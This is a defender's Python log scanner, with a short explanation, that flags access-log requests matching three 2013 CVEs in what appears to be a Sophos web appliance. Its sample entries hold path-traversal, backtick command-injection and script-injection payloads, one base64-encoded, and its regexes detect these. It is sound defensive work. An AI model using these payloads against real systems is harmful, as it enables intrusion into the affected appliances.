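A defender's check for the GET request patterns shown in the proof of concept above, as an added example that is not part of the SEC Consult advisory or of any Sophos code: it flags those patterns in web server access logs. The Apache combined log format, the function names and the sample entries are assumptions; the POST bodies used against Diagnostic Tools and Local Site List do not appear in such logs and are out of scope.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of an Apache combined-format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"[`$;|&<>]")
MARKUP = re.compile(r"<\s*/?\s*script", re.IGNORECASE)

def _b64_text(value):
    """Decode a strictly valid base64 value, else return an empty string."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:
        return ""

def classify(log_line):
    """Return the advisory findings that one logged request matches."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return set()
    url = urlsplit(match.group(1))
    hits = set()
    # parse_qsl percent-decodes, so %60 and %00 arrive as a backtick and NUL.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if url.path.endswith("/patience.cgi") and name == "id":
            if ".." in value or "\x00" in value:
                hits.add("CVE-2013-2641")
        if url.path.startswith("/end-user/") and name == "client-ip":
            if SHELL_META.search(value):
                hits.add("CVE-2013-2642")
        if MARKUP.search(value) or MARKUP.search(_b64_text(value)):
            hits.add("CVE-2013-2643")
    return hits

# Constructed sample entries; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Apr/2013:10:00:01 +0000] "GET /cgi-bin/patience.cgi?id=../../log/ui_access_log%00 HTTP/1.1" 200 512',
    '192.0.2.10 - - [03/Apr/2013:10:00:05 +0000] "GET /end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 HTTP/1.1" 200 139',
    '192.0.2.11 - - [03/Apr/2013:10:01:00 +0000] "GET /end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d HTTP/1.1" 200 90',
    '192.0.2.11 - - [03/Apr/2013:10:01:02 +0000] "GET /rss.php?action=allow&xss=%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 90',
    '192.0.2.12 - - [03/Apr/2013:10:02:00 +0000] "GET /end-user/index.php?reason=application&client-ip=10.1.2.3 HTTP/1.1" 200 139',
]

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean requests."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := classify(line))}
```

Calling scan(SAMPLE_LOG) reports the first four entries and leaves the benign Block page request unflagged; the base64 branch is what catches the errdoc.php case, whose payload never appears as literal markup in the log.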